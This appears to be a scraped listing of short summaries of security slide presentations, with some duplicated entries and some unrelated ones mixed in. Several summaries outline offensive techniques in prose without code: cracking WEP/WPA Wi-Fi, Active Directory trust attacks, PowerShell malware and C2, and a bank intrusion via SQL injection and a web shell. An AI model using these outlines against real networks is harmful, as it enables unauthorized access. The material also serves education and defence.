This paper introduce practical techniques used by hackers to break the wireless security.
We recommend that the reader should have basic knowledge of wireless operation.
This document provides an overview of Python cryptography and security topics including cryptography concepts like hashing, symmetric and asymmetric encryption, digital signatures, and Python libraries for working with cryptography like PyCrypto and Cryptography. It also discusses Django security best practices like using HTTPS, securing cookies and passwords, and access control.
This document provides an introduction to Snort rule syntax and content matching. It describes the basic components of a Snort rule including the rule header, action, protocols, addresses, ports, and rule options. It then covers various content matching techniques like content, pcre, and content modifiers like nocase, offset, depth, distance, and within. It also discusses negated content matching, content buffers, and fast_pattern. Finally, it provides examples of how content matching can be used for detection strategies like traffic triage and isolating vulnerable application traffic.
Carlos García - Pentesting Active Directory Forests [rooted2019]
The document discusses penetration testing of Active Directory forests and trusts. It begins with an introduction to forests, domains, and trust types. It then covers authentication protocols like NTLM and Kerberos across trusts. Next, it discusses techniques for enumerating trusts and mapping the trust relationships. The document outlines common attacks when domain admin privileges are available, such as using Golden Tickets and SID history exploitation. For situations without domain admin, it recommends reconnaissance of trusts and objects to map a path to privileged accounts.
Powershella lubią admini, programiści, a najbardziej hakerzy. Będąc natywną powłoką systemów Windows nie rzuca się w oczy, jednocześnie dając ogromne możliwości ofensywne. Podczas prelekcji Paweł zaprezentuje zarówno skuteczne one-linery jak i wielolinijkowe skrypty, które mogą siać spustoszenie w nieprzygotowanej organizacji. Pojawią się ciekawe kanały C2, malware napisany w całości w Powershellu, wyszukiwanie i eksploitacja słabo skonfigurowanych serwerów MSSQL etc.100% mięsa.
This document discusses WPA exploitation in wireless networks. It begins by explaining basic wireless networking concepts like WiFi, MAC addresses, and SSIDs. It then describes how wireless networks are vulnerable due to weak encryption methods like WEP. The document outlines stronger encryption methods like WPA and WPA2, but notes they can still be cracked with tools if a weak password is used. It proceeds to explain how tools like Aircrack-ng, Reaver, and John the Ripper can be used to crack wireless network encryption keys through techniques like packet sniffing, dictionary attacks, and exploiting WPS pins. In the end, it emphasizes the importance of using long, complex passwords to keep wireless networks secure.
Linux Server Hardening
This document has the step by step of the way of hardening the server. We have used the metasploitable server, the vulnerable ubuntu server designed to be hacked, and have done the hardening. We have stopped all the unnecessary services and ports. We have assumed the server to be the web server only. Hence, only port 80 and 443 will be opened. Then the firewall rules have been set following by the apache web server hardening, encryption of the folder and files, disabling the unwanted users, forcing the password policies.
Holland safenet livehack hid usb pineapple_cain_oph_with_video
This document discusses hacking tools and techniques that could enable man-in-the-middle attacks on wireless networks. It describes how a wireless penetration testing device could intercept probe requests from a device looking to connect to a wireless network, and respond posing as the legitimate network to establish a connection. Once connected, the device could monitor and manipulate web traffic using tools like Cain & Abel, ARP poisoning, and DNS spoofing. Rainbow tables are also mentioned as a tool for cracking Windows passwords using hashed values within a few minutes. Throughout, the document emphasizes these techniques should only be used for legitimate security testing and not illegal hacking.
FROM KERNEL SPACE TO USER HEAVEN at NUIT DU HACK 2013 by JAIME SANCHEZ
More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com
What if you could enqueue from kernel space to user space all your incoming and outgoing network connections? Maybe you could develop some offensive/defensive applications to modify headers and payloads in real time, to detect unauthorized traffic like dns tunneling connections or to fool some well known network tools. This will be showed in Linux-powered devices. It will be explained too some remote OS fingerprinting techniques, both active and passive, implemented in tools like nmap, p0f, or vendor appliances, and a how to defeat them. This technique doesn't need virtual machines or kernel patches, and is highly portable to other platforms.
JavaFest. Nanne Baars. Web application security for developersFestGroup
Security is an important topic for developers however security is often an afterthought in a project. This presentation will focus on practices which developers need to be aware of, and make security fun again. This is an in depth talk about 10 topics not an overview for security best practices.
Transforming Security: Containers, Virtualization and SoftwarizationPriyanka Aash
This session will explore how we can leverage containers, network/endpoint virtualization technologies and virtualized security instrumentation, concurrently, to transformationally improve security visibility, security analytics, system resilience and actionable context, greatly increasing our ability to attest that systems will be secure and compliant in any state into which they may be driven.
(Source: RSA USA 2016-San Francisco)
This document discusses the Shellshock vulnerability in the Bash shell. It provides background on Bash and describes how the vulnerability allows remote code execution. It then summarizes the timeline of vulnerability discovery and patches. Potential attack vectors like CGI scripts, DHCP, SSH, and SMTP are explained. Examples of known attacks from botnets, worms, and against Yahoo servers are also mentioned.
This document provides an overview of Python cryptography and security topics including cryptography concepts like hashing, symmetric and asymmetric encryption, digital signatures, and Python libraries for working with cryptography like PyCrypto and Cryptography. It also discusses Django security best practices like using HTTPS, securing cookies and passwords, and access control.
This document provides an introduction to Snort rule syntax and content matching. It describes the basic components of a Snort rule including the rule header, action, protocols, addresses, ports, and rule options. It then covers various content matching techniques like content, pcre, and content modifiers like nocase, offset, depth, distance, and within. It also discusses negated content matching, content buffers, and fast_pattern. Finally, it provides examples of how content matching can be used for detection strategies like traffic triage and isolating vulnerable application traffic.
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
The document discusses penetration testing of Active Directory forests and trusts. It begins with an introduction to forests, domains, and trust types. It then covers authentication protocols like NTLM and Kerberos across trusts. Next, it discusses techniques for enumerating trusts and mapping the trust relationships. The document outlines common attacks when domain admin privileges are available, such as using Golden Tickets and SID history exploitation. For situations without domain admin, it recommends reconnaissance of trusts and objects to map a path to privileged accounts.
Powershella lubią admini, programiści, a najbardziej hakerzy. Będąc natywną powłoką systemów Windows nie rzuca się w oczy, jednocześnie dając ogromne możliwości ofensywne. Podczas prelekcji Paweł zaprezentuje zarówno skuteczne one-linery jak i wielolinijkowe skrypty, które mogą siać spustoszenie w nieprzygotowanej organizacji. Pojawią się ciekawe kanały C2, malware napisany w całości w Powershellu, wyszukiwanie i eksploitacja słabo skonfigurowanych serwerów MSSQL etc.100% mięsa.
This document discusses WPA exploitation in wireless networks. It begins by explaining basic wireless networking concepts like WiFi, MAC addresses, and SSIDs. It then describes how wireless networks are vulnerable due to weak encryption methods like WEP. The document outlines stronger encryption methods like WPA and WPA2, but notes they can still be cracked with tools if a weak password is used. It proceeds to explain how tools like Aircrack-ng, Reaver, and John the Ripper can be used to crack wireless network encryption keys through techniques like packet sniffing, dictionary attacks, and exploiting WPS pins. In the end, it emphasizes the importance of using long, complex passwords to keep wireless networks secure.
Linux Server Hardening - Steps by StepsSunil Paudel
Linux Server Hardening
This document has the step by step of the way of hardening the server. We have used the metasploitable server, the vulnerable ubuntu server designed to be hacked, and have done the hardening. We have stopped all the unnecessary services and ports. We have assumed the server to be the web server only. Hence, only port 80 and 443 will be opened. Then the firewall rules have been set following by the apache web server hardening, encryption of the folder and files, disabling the unwanted users, forcing the password policies.
Holland safenet livehack hid usb pineapple_cain_oph_with_videorobbuddingh
This document discusses hacking tools and techniques that could enable man-in-the-middle attacks on wireless networks. It describes how a wireless penetration testing device could intercept probe requests from a device looking to connect to a wireless network, and respond posing as the legitimate network to establish a connection. Once connected, the device could monitor and manipulate web traffic using tools like Cain & Abel, ARP poisoning, and DNS spoofing. Rainbow tables are also mentioned as a tool for cracking Windows passwords using hashed values within a few minutes. Throughout, the document emphasizes these techniques should only be used for legitimate security testing and not illegal hacking.
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
FROM KERNEL SPACE TO USER HEAVEN at NUIT DU HACK 2013 by JAIME SANCHEZ
More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com
What if you could enqueue from kernel space to user space all your incoming and outgoing network connections? Maybe you could develop some offensive/defensive applications to modify headers and payloads in real time, to detect unauthorized traffic like dns tunneling connections or to fool some well known network tools. This will be showed in Linux-powered devices. It will be explained too some remote OS fingerprinting techniques, both active and passive, implemented in tools like nmap, p0f, or vendor appliances, and a how to defeat them. This technique doesn't need virtual machines or kernel patches, and is highly portable to other platforms.
The document discusses the Web Crypto API which allows cryptographic operations like hashing, signatures, and encryption/decryption to be performed in web applications. It covers the SubtleCrypto interface which provides cryptographic algorithms and methods. Some key methods include importKey, deriveKey, encrypt, and decrypt. It also discusses concepts like symmetric keys, AES-GCM encryption, PBKDF2 key derivation, and storing encrypted data with salts and initialization vectors. An example is provided of encrypting and decrypting data with a password using these Web Crypto API methods.
Ipv6 Security with Mikrotik RouterOS by Wardner MaiaWardner Maia
This document provides an overview and introduction to IPv6 security presented by Wardner Maia. Some key points:
- Wardner Maia is a Brazilian engineer and IPv6 security expert who will discuss new threats introduced by IPv6 features and protocols.
- IPv6 adoption is important due to the depletion of IPv4 addresses but it introduces new security challenges due to its new features and protocols.
- The presentation will cover reconnaissance techniques enabled by IPv6's large address space, vulnerabilities in address autoconfiguration and neighbor discovery, and countermeasures using Mikrotik RouterOS firewall rules.
- Live demonstrations will show how threats like man-in-the-middle attacks can be carried out using IPv6 neighbor
Derevolutionizing OS Fingerprinting: The cat and mouse gameJaime Sánchez
With the explosive growth and distributed nature of computer networks, it has become progressively more difficult to manage, secure, and identify Internet devices. An outsider has the capability to discover general information, such as which operating system a host is running, by searching for default stack parameters, ambiguities in IETF RFCs or non-compliant TCP/IP implementations in responses to malformed requests. By pinpointing the exact OS of a host, an attacker can launch an educated and precise attack against a target machine.
There are lot of reasons to hide your OS to the entire world:
Revealing your OS makes things easier to find and successfully run an exploit against any of your devices.
Having and unpatched or antique OS version is not very convenient for your company prestige. Imagine that your company is a bank and some users notice that you are running an unpatched box. They won't trust you any longer! In addition, these kind of 'bad' news are always sent to the public opinion.
Knowing your OS can also become more dangerous, because people can guess which applications are you running in that OS (data inference). For example if your system is a MS Windows, and you are running a database, it's highly likely that you are running MS-SQL.
It could be convenient for other software companies, to offer you a new OS environment (because they know which you are running).
And finally, privacy; nobody needs to know the systems you've got running.
This talk aims to present well-known methods that perform classification using application-layer traffic (TCP/IP/UDP headers, ICMP packets, or some combination thereof), old style approaches to defeat remote OS fingerprinting (like tweaking Windows registry or implement patches to the Linux kernel) and why this doesn't work with nowadays and could affect TCP/IP stack performance. We'll also present a new approach to detect and defeat both active/passive OS fingerprint with OSfooler-NG, a completely rewritten tool, highly portable, completely undetectable for the attackers and capable of detecting and defeating famous tools like nmap, p0f, Xprobe, pfsense and many commercial engines.
Sorry guys, OS fingerprinting is over...
This document introduces Tortilla, software designed to allow security researchers to safely and anonymously interact with hostile servers and actors online. It discusses how traditional malware research was more passive, but now requires actively monitoring adversary infrastructure. The Tor network and Tor Browser Bundle are described as existing solutions for anonymity, but they have limitations like only supporting the Firefox browser and not plugins. Tortilla aims to address these issues by providing a more robust anonymity solution.
End-to-End Analysis of a Domain Generating Algorithm Malware Family WhitepaperCrowdStrike
The document provides an overview of domain generating algorithms (DGAs) used by malware to dynamically determine remote server addresses and evade detection. It details the analysis performed on a malware family submitted to CrowdStrike, including deobfuscating the binary, analyzing its DGA and network functionality, sinkholing domains, and investigating the malware author. The family has been active for at least six years and infects thousands of devices.
Apresentação na Pós-Graduação em Segurança da Informação:
- Sniffer de senhas em plain text;
- Ataque de brute-force no SSH;
- Proteção: Firewall, IPS e/ou TCP Wrappers;
- Segurança básica no sshd_config;
- Chaves RSA/DSA para acesso remoto;
- SSH buscando chaves no LDAP;
- Porque previnir o acesso: Fork Bomb
This document discusses computer network security. It begins by defining security and explaining why security is needed, then discusses common security threats like firewalls, denial of service attacks, and TCP hijacking. The most vulnerable targets are listed as financial institutions, internet service providers, and government agencies. The document then explains specific security mechanisms and attacks in more detail, such as firewalls and intrusion detection systems, different types of denial of service attacks, and how TCP hijacking works. It stresses the importance of security updates and patching known vulnerabilities.
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam tests📡 Sebastien Dudek
Presentation made at SecurityPWNing 2018 explaining how to intrude a company using radio attacks and real cases scenarios we encountered during our tests.
Park Quantification Of Aesthetic Viewing Using Eye Tracking Technology The In...Kalle
The purpose of this study is to explore how the viewers’ previous training is related to their aesthetic viewing in various interactions with the form and the context, in relation to apparel design. Berlyne’s two types of exploratory behavior, diversive and specific, provided a theoretical framework to this study. Twenty female subjects (mean age=21, SD=1.089) participated. Twenty model images, posed by a male and a female model, were shown on an eye-tracker screen for 10 seconds each. The findings of this study verified Berlyne’s concepts of visual exploration. One of the different findings from Berlyne’s theory was that the untrained viewers’ visual attention tended to be more significantly focused on peripheral areas of visual interest, compared to the trained viewers, while there was no significant difference on the central, foremost areas of visual interest between the two groups. The overall aesthetic viewing patterns were also identified.
Dokumen tersebut merupakan portofolio desain grafis dan iklan Muhammad Yustan yang berisi ringkasan beberapa karyanya yang pernah diikutsertakan dalam berbagai kompetisi dan tugas kuliah, antara lain untuk kompetisi Pinasthika dan Caraka serta tugas mata kuliah Penulisan Naskah Iklan.
This document provides instructions for an activity where students will classify animals into groups based on observable features. The activity involves students sorting plastic animals from two bags into groups based on characteristics like appearance, habitat, and behavior. The document defines key terms like classification, species, vertebrates and invertebrates. It explains that animals can be classified in multiple ways, such as by color, size, or as mammals. Students are asked to observe the animals, list features, determine the number of different types, and sort them into two initial groups. They then add animals from a second bag to the appropriate groups, explaining their reasoning. Finally, students are asked to consider if living things can be grouped in more ways than one and if
The Livescribe pen allows users to take notes using the pen on special dot paper notebooks while simultaneously recording any discussions or lectures. The pen acts as a computer, storing up to 2GB or 4GB of data on the pen itself. Users can playback any recordings directly from the pen or by uploading notes to their computer. The pen has applications for both education and other uses, but requires the specialized dot paper and can be cost prohibitive for student use. However, it provides benefits like enhancing learning through playback of lectures and collaboration on projects.
Takemura Estimating 3 D Point Of Regard And Visualizing Gaze Trajectories Und...Kalle
The portability of an eye tracking system encourages us to develop a technique for estimating 3D point-of-regard. Unlike conventional methods, which estimate the position in the 2D image coordinates of the mounted camera, such a technique can represent richer gaze information of the human moving in the larger area. In this paper, we propose a method for estimating the 3D point-of-regard and a visualization technique of gaze trajectories under natural head movements for the head-mounted device. We employ visual SLAM technique to estimate head configuration and extract environmental information. Even in cases where the head moves dynamically, the proposed method could obtain 3D point-of-regard. Additionally, gaze trajectories are appropriately overlaid on the scene camera image.
The document summarizes a hacking attack on a company called mBank. The attack involved scanning the website for vulnerabilities, finding credentials in PHP files that allowed accessing the MySQL database, and uploading a PHP shell to gain remote access. Key steps included SQL injection to find files on the server, extracting credentials from the configuration file to access the database as the root user, and using the database to upload a web shell.
Katherine Brittain selected final images for an ancillary task involving a band. She chose individual pictures of the singer, guitarist, bassist, and drummer that showed each band member well. She also selected a group shot of the full band, though some editing would be needed to adjust sizes and remove a t-shirt graphic. Additionally, Katherine chose a solo shot of the singer that could be edited to resemble a Rhianna album cover.
- Amy and a classmate worked on creating a music video over several months from September 2009 to April 2010. They researched music videos, analyzed songs and videos, created storyboards and designs, filmed and edited footage, and created supplemental materials like a marketing plan. They worked as a team to complete the project, with each contributing ideas, though the classmate felt Amy could have been more involved in editing and supplemental tasks. In the end, they managed to finish the project on time despite some inconsistent work periods.
Ahmad Siddiq Wi-Fi Ninjutsu Exploitationbarcamp.my
The document provides instructions on techniques for cracking wireless network security, including both WEP and WPA encryption. It discusses using tools like aircrack-ng to capture packets, perform injection attacks like deauthentication, ARP replay, and fragmentation. Both simple techniques without injection, like capturing packets over time, and more advanced techniques using packet injection methods are covered. The goal is to obtain enough encrypted packets or keystream fragments to crack the network encryption key.
Wireless Pentesting: It's more than cracking WEPJoe McCray
The document discusses the methodology for wireless penetration testing. It covers reconnaissance of wireless networks to identify available networks and access points. Next, it discusses attacking wireless networks by breaking encryption like WEP, and manipulating wireless authentication. It also covers bypassing wireless isolation controls and deploying rogue access points. The goal of the testing is to determine if an attacker can access the production network over the wireless medium.
This document discusses cracking WEP secured wireless networks. It begins by explaining that WEP is an outdated protocol with known weaknesses that can be cracked within minutes using readily available software. It then provides details on WEP authentication methods and how the encryption works. The main weakness discussed is that the 24-bit initialization vector is not long enough to ensure uniqueness, allowing the key to be cracked. The document concludes by demonstrating how to enable monitor mode, attack a target network to capture packets, and use those packets to crack the WEP key in minutes using aircrack-ng software on BackTrack Linux. It advises moving to more secure WPA or WPA2 encryption.
This session covered cyber security and ethical hacking topics such as network hacking, Kali Linux, IPV4 vs IPV6, MAC addresses, wireless hacking techniques like deauthentication attacks, cracking WEP and WPA encryption, and post-connection attacks including ARP spoofing and MITM attacks. The presenter emphasized the importance of securing networks by using strong passwords, disabling WPS, and enabling HTTPS to prevent hacking attempts.
The document discusses techniques for conducting a "grey-box" attack on Windows and Linux systems. It covers scanning and enumeration of open ports and services using Nmap to identify vulnerabilities. It then discusses methods for gaining initial access, including exploiting the null session vulnerability in Windows 2000 to enumerate user accounts. It also discusses privilege escalation techniques to gain full control of compromised systems. The document provides examples using Nmap and Metasploit to automate vulnerability scanning and exploitation.
The document provides an overview of cracking WiFi networks using aircrack-ng and related tools. It discusses network basics like MAC addresses and wireless modes like managed and monitor. It then covers specific attacks like deauth attacks to disconnect clients, capturing handshakes using airodump-ng and packet injection with aireplay-ng. Finally it discusses cracking encrypted networks starting with older WEP encryption through WPA and WPA2 using captured handshakes and wordlist attacks with aircrack-ng. The document serves as a guide to common WiFi cracking techniques.
This document discusses wireless hacking and security. It begins by explaining why wireless networks are popular due to convenience and cost but also introduces security issues. It then covers wireless standards, encryption types like WEP, WPA and WPA/PSK. The document details how to hack wireless networks by locating them, capturing packets to crack encryption keys using tools like Kismet, Aircrack and commands like ifconfig. Finally, it provides tips to prevent wireless hacking including not broadcasting SSIDs, changing default logins and using stronger encryption like WPA.
This ppt includes what is wireless hacking, types of wi-fi eg,wep,wpa,wpa/psk and terms related to it .this also conclude how to crack the wireless hacking ,the tools and commands required for it. this is very usefull . catch it..... :)
International Conference On Electrical and Electronics Engineeringanchalsinghdm
ICGCET 2019 | 5th International Conference on Green Computing and Engineering Technologies. The conference will be held on 7th September - 9th September 2019 in Morocco. International Conference On Engineering Technology
The conference aims to promote the work of researchers, scientists, engineers and students from across the world on advancement in electronic and computer systems.
A tutorial showing you how to crack wifi passwords using kali linux!edwardo
1. The document provides instructions for cracking WiFi passwords through the command line interface (CMD) on a Kali Linux system. It outlines 5 steps: starting the wireless card in monitor mode, capturing wireless traffic with airodump-ng, identifying the target access point, checking if it has WPS enabled with wash, and cracking the password with reaver if WPS is enabled.
2. It explains some key information displayed during the capturing process like the BSSID, signal strength, encryption, and ESSID.
3. The full process took around 5 hours to crack a 19 character WPA2 password on a virtual machine, but the time can vary depending on hardware. Turning off WPS is
Auditing a Wireless Network and Planning for a Secure WLAN ImplementationCARMEN ALCIVAR
The document is a lab assignment summarizing an audit of a wireless network. The student found that the network was vulnerable due to a lack of encryption. Using tools like aircrack-ng, the student was able to capture login credentials and other data in clear text. The student then used a dictionary attack to crack the WPA key and gain unauthorized access to the network. In their recommendations, the student emphasizes using strong encryption methods like WPA2 and multifactor authentication to secure the wireless network and prevent unauthorized access.
How to Hack WPA/WPA2 Wi Fi with Kali Linux. Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks.
Warning..!! WIFI hacking is illegal. "This ppt is only for educational purposes. I am not responsible for any consequences."
Pentesting Wireless Networks and Wireless Network SecurityAyoma Wijethunga
Regardless of residential or corporate environments, wireless networking has been trending, bringing WLAN equipment revenue up to $5.2 billion in 2015. Unlike wired networks, wireless networks go beyond the walls, and could transmit your corporate or personal data in a way anyone else can eavesdrop. With the quick adaptation of wireless networking, control of smart devices, including smart home devices and smart cars that might be at hands of a blackhat hacker. Looking from a different angle, every time you connect to an untrusted wireless network, a malicious attacker might be listening to your communication.
This session will technically discuss security risks associated with wireless networks, with near real-life demonstrations. Different network security mechanisms and their weaknesses will be discussed. Towards the end of the session, we will be discussing best practices that should be followed to secure wireless networks and your data over wireless networks.
Demonstrations will include following.
* Wireless network discovery and probing
* Wireless network attacks (WEP/WPA/WPS)
* Using OpenWrt open source firmware in wireless security
* Rough wireless access points (MitM/Traffic Logging)
The document summarizes a presentation on wireless security. It discusses wireless standards like 802.11b, 802.11a, and 802.11g and security standards like WEP, WPA, and WPA2. It describes vulnerabilities in WEP like weak IVs and keys. It also explains attacks like identity theft through MAC spoofing and defenses like strong encryption, authentication, and regular key changes.
The document summarizes a presentation on wireless security. It discusses wireless standards like 802.11b, 802.11a, and 802.11g and security standards like WEP, WPA, and WPA2. It describes vulnerabilities in WEP like weak IVs and keys. It also explains attacks like identity theft through MAC spoofing and defenses like strong encryption, authentication, and monitoring.
Welcome to the world of 'network security' which is an unavoidable term in cyber security. This white paper of Network security encompasses the most significant and predominantly used networking security concepts which are highly important for maintaining your network environment secure.
This document provides an overview of AirCrack-ng, a suite of tools for assessing WiFi network security. It discusses the tools in the AirCrack-ng suite like aircrack-ng for cracking WEP and WPA/WPA2 keys. It also describes commands used like airmon-ng to put interfaces in monitor mode and airodump-ng to capture handshakes. The document explains how to use captured handshakes and wordlists with aircrack-ng to crack network passwords if the password is in the wordlist. It also discusses how to perform WiFi deauthentication attacks to capture new handshakes by forcing clients to reconnect.
Shameful secrets of proprietary network protocolsSlawomir Jasek
There is a big bunch of tools offering HTTP/SSL traffic interception. However, when it comes to penetration tests of specialized embedded software or thick clients, we often encounter proprietary protocols with no documentation at all. Binary TCP connections, unlike anything, impossible to be adapted by a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. Though, based on our experience, it very often hides a shameful secret - completely unsecured mechanisms breaking all secure coding practices.
To demonstrate, we will show a few case-studies - most interesting examples from real-life industry software, which in our opinion are a quintessence of "security by obscurity". We will challenge the security of proprietary protocols in pull printing solutions, FOREX trading software, remote desktops and home automation technologies.
This document outlines various mobile application security vulnerabilities and methods for assessing mobile application security. It discusses insecure network protocols, cryptographic weaknesses, privacy issues related to data storage, authentication and session management vulnerabilities, environmental interaction risks, and challenges of securing mobile applications against reverse engineering. It provides examples of specific vulnerabilities discovered in mobile applications and frameworks. The document promotes applying a defense-in-depth approach to mobile application security based on the OWASP Mobile Application Security Verification Standard (MASVS).
This document discusses a project called CARzyPire that involves using a Raspberry Pi Zero W, Crazyradio PA, and PowerShell Empire installed on a remote-controlled car to conduct penetration testing. It provides instructions on setting up the necessary hardware and software, including customizing a PowerShell Empire payload to bypass Windows Defender and creating a Duckyscript to deliver the payload. The payload would then be delivered to targets using the remote-controlled car and Crazyradio PA's ability to hijack wireless keyboards and mice. Control of any successful implants would be maintained using PowerShell Empire's web interface.
The document discusses various techniques for exploiting web applications, beginning with older techniques like exploiting default admin paths, uploading web shells, and SQL injection, and progressing to more modern attacks against content management systems and frameworks. It provides examples of each technique and emphasizes exploiting vulnerabilities like file inclusion and stored procedures to achieve remote code execution. The instructor profile indicates extensive security experience and certifications. The organization Secure D Center is introduced as focusing on cybersecurity services across Southeast Asia.
The session will provide the risk of insecure mobile application development in various types with demonstration; Client-side, Communication channel and Server side. The presentation includes case study of insecure development practice which lead attacker to abuse the vulnerable application (e.g. Coin/Gem cheating on gaming app, Bypassing security control on client-side and server-side).
The document discusses the Mobile Application Security Verification Standard (MASVS) project from OWASP. It provides an overview of the MASVS levels and describes the eight verification requirements areas: 1) Architecture, Design and Threat Modeling; 2) Data Storage and Privacy; 3) Cryptography; 4) Authentication and Session Management; 5) Network Communication; 6) Platform Interaction; 7) Code Quality and Build Setting; and 8) Resilience. Each verification requirement area includes example requirements and references related information. The goal of MASVS is to provide a standard way to verify the security of mobile apps and help developers build more secure apps.
TL;DR
Motivation
Dynamic binary instrumentation
FRIDA
DBI without rooting / jailbreaking
Unleash the power of Frida
Case study for runtime exploitation
Countermeasure
References
The document discusses the WannaCry ransomware attack of May 2017. It begins with an overview of ransomware, including what it is, how it spreads, and examples like CryptoLocker and WannaCry. It then details the global WannaCry attack, how it exploited the EternalBlue vulnerability to encrypt files and demand ransom payments in Bitcoin. Key lessons are around patching systems promptly, having backups, and following best practices to prevent ransomware infection and limit damage. The timeline shows the lead up to WannaCry, from the Shadow Brokers leak of NSA tools to Microsoft releasing an emergency patch once the attacks began.
The document summarizes the key findings of a report analyzing 126 popular mobile health and finance apps. It found that while consumers and executives believe their apps are secure, 90% of apps tested had at least two of the top 10 mobile security risks as defined by OWASP. Specifically, 98% lacked binary protections and 83% had insufficient transport layer protection. The document then outlines the 10 most critical mobile security risks according to OWASP, including improper platform usage, insecure data storage, insecure communication, and extraneous functionality.
Prathan Phongthiproek, a manager at KPMG Thailand, gave a presentation on mobile application attacks at the Cyber Defense Initiative Conference (CDIC) 2016. The presentation covered various attack vectors for both Android and iOS applications, including user input attacks, abusing application components, insecure data storage, manipulating binary and storage files, bypassing root/jailbreak detection, and intercepting network traffic. For each attack vector, the presentation estimated the potential damage level and threat level. The goal was to help organizations better understand mobile application security risks and implement proper countermeasures.
The document discusses the benefits of exercise for mental health. It states that regular physical activity can help reduce anxiety and depression and improve mood and cognitive function. Exercise causes chemical changes in the brain that may help protect against developing mental illness and improve symptoms for those who already suffer from conditions like anxiety and depression.
The document discusses vulnerabilities in point-of-sale (POS) systems, including data in memory, data at rest, data in transit, and application code/configuration vulnerabilities. It describes different POS deployment models and their pros and cons in terms of security. A case study examines physical and network security issues found during a pentest of a retail store's POS system, including sensitive data exposure over the network. Recommended protections include minimizing data exposure, encryption of data in memory, in transit, and at rest, and avoiding storage of sensitive data.
This document discusses penetration testing methodologies and best practices. It emphasizes that penetration testing involves more than just tools - it requires following a proper methodology, managing risks, and providing targeted recommendations to clients. It provides examples of penetration testing case studies and highlights the importance of going beyond automated scans to conduct manual testing of authentication, authorization, business logic, and client-side vulnerabilities. The document stresses that penetration testers should think creatively and "outside the box" to identify security issues rather than just trusting scan results.
The document discusses security issues related to mobile applications. It describes how mobile apps now offer many more services than basic phone calls and texts. This expanded functionality introduces new attack surfaces, including the client software on the device, the communication channel between the app and server, and server-side infrastructure. Some common vulnerabilities discussed are insecure data storage on the device, weaknesses in data encryption, SQL injection, and insecure transmission of sensitive data like credentials over the network. The document also provides examples of techniques for analyzing app security like reverse engineering the app code and using a proxy like Burp Suite to intercept network traffic.
The document discusses common web application vulnerabilities like SQL injection, cross-site scripting (XSS), file inclusion, and remote code execution. It provides examples of each vulnerability type and how they can be exploited. Methods for detecting and preventing these vulnerabilities are also covered, including input validation, output encoding, limiting dangerous functions, and using tools like RIPS scanner to detect vulnerabilities.
The document summarizes a presentation on advanced mobile penetration testing. It discusses attacking three surfaces: the client software on mobile devices, the communications channel, and server-side infrastructure. It provides examples of exploiting iOS and Android applications, such as decompiling code, intercepting traffic with proxies, and accessing embedded data and databases. The presentation emphasizes fast, hands-on techniques and tools for assessing mobile application security.
This document introduces Web Application Firewall (WAF) and discusses techniques for bypassing WAF protections, including SQL injection, cross-site scripting, file inclusion, HTTP parameter contamination, and HTTP pollution attacks. It provides examples of bypassing specific WAF vendors and open source WAFs like ModSecurity and PHPIDS. While WAFs can block some attacks, the document argues they cannot eliminate all vulnerabilities and proper secure coding is still needed. It concludes that WAFs may succeed or fail depending on configurations and imaginative attacks.
The document discusses security and privacy challenges in the digital age, focusing on client-side or "layer 8" hacking techniques that target human vulnerabilities. It describes how hackers gather information on targets from social media, documents, and email to craft spear phishing attacks. The document also outlines automated exploitation techniques using known vulnerabilities in browsers, plugins and applications, demonstrating how hackers can easily compromise systems without any user interaction. It emphasizes the importance of user awareness training, security policies, and sanitizing public documents and files to reduce the risks of these client-side attacks.
The document discusses security challenges posed by modern malware and web-based attacks. It provides examples of next-generation malware that bypass antivirus detection using techniques like embedding malicious code in Office documents or PDF files. It also discusses how web-based malware has evolved from defacements and DDoS tools to more advanced drive-by download attacks using exploit kits. The document aims to demonstrate malware analysis techniques and how to detect web server backdoors through tools and manual source code reviews. It concludes with a challenge to practice security skills safely.
This document provides an overview of mobile phone forensic analysis, focusing on analysis of the iPhone. It discusses jailbreaking iPhones to allow forensic acquisition and analysis of file systems. It also discusses analyzing iTunes backup files from iPhones, which can contain data like call history, SMS messages, photos and more. Tools are presented for extracting and analyzing data from both jailbroken iPhones and iTunes backup files. The document emphasizes the importance of forensic soundness when acquiring data from mobile devices.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...Toru Tamaki
Jindong Gu, Zhen Han, Shuo Chen, Ahmad Beirami, Bailan He, Gengyuan Zhang, Ruotong Liao, Yao Qin, Volker Tresp, Philip Torr "A Systematic Survey of Prompt Engineering on Vision-Language Foundation Models" arXiv2023
https://arxiv.org/abs/2307.12980
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxSynapseIndia
Your comprehensive guide to RPA in healthcare for 2024. Explore the benefits, use cases, and emerging trends of robotic process automation. Understand the challenges and prepare for the future of healthcare automation
Blockchain technology is transforming industries and reshaping the way we conduct business, manage data, and secure transactions. Whether you're new to blockchain or looking to deepen your knowledge, our guidebook, "Blockchain for Dummies", is your ultimate resource.
How Social Media Hackers Help You to See Your Wife's Message.pdfHackersList
In the modern digital era, social media platforms have become integral to our daily lives. These platforms, including Facebook, Instagram, WhatsApp, and Snapchat, offer countless ways to connect, share, and communicate.
Support en anglais diffusé lors de l'événement 100% IA organisé dans les locaux parisiens d'Iguane Solutions, le mardi 2 juillet 2024 :
- Présentation de notre plateforme IA plug and play : ses fonctionnalités avancées, telles que son interface utilisateur intuitive, son copilot puissant et des outils de monitoring performants.
- REX client : Cyril Janssens, CTO d’ easybourse, partage son expérience d’utilisation de notre plateforme IA plug & play.
Best Programming Language for Civil EngineersAwais Yaseen
The integration of programming into civil engineering is transforming the industry. We can design complex infrastructure projects and analyse large datasets. Imagine revolutionizing the way we build our cities and infrastructure, all by the power of coding. Programming skills are no longer just a bonus—they’re a game changer in this era.
Technology is revolutionizing civil engineering by integrating advanced tools and techniques. Programming allows for the automation of repetitive tasks, enhancing the accuracy of designs, simulations, and analyses. With the advent of artificial intelligence and machine learning, engineers can now predict structural behaviors under various conditions, optimize material usage, and improve project planning.
